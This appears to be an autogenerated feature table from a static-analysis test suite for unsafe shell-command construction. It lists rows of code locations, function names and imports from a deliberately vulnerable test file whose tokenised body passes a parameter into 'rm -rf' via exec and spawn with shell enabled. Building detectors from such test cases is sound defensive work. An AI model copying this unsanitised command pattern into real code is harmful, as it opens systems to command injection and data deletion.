Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:37:420:47 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | CalleeFlexibleAccessPath | cp.spawnSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | InputAccessPathFromCallee | 2.shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | assignedToPropName | shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:44:420:47 | true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:16 | SPAWN_OPT | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:16 | SPAWN_OPT | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:16 | SPAWN_OPT | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:16 | SPAWN_OPT | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:16 | SPAWN_OPT | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_O ... : true} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_O ... : true} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_O ... : true} | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_O ... : true} | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_O ... : true} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_OPT | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_OPT | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_OPT | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_OPT | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:8:422:32 | SPAWN_OPT | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:20:422:32 | {shell: true} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:20:422:32 | {shell: true} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:20:422:32 | {shell: true} | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:20:422:32 | {shell: true} | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:20:422:32 | {shell: true} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:25 | shell | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:25 | shell | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:25 | shell | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:25 | shell | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:25 | shell | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:21:422:31 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:28:422:31 | true | assignedToPropName | shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:28:422:31 | true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:28:422:31 | true | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:28:422:31 | true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:28:422:31 | true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:422:28:422:31 | true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:6 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:6 | spawn | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:6 | spawn | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:6 | spawn | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:6 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | exceptional return of spawn(" ... WN_OPT) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | exceptional return of spawn(" ... WN_OPT) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | exceptional return of spawn(" ... WN_OPT) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | exceptional return of spawn(" ... WN_OPT) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | exceptional return of spawn(" ... WN_OPT) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | spawn(" ... 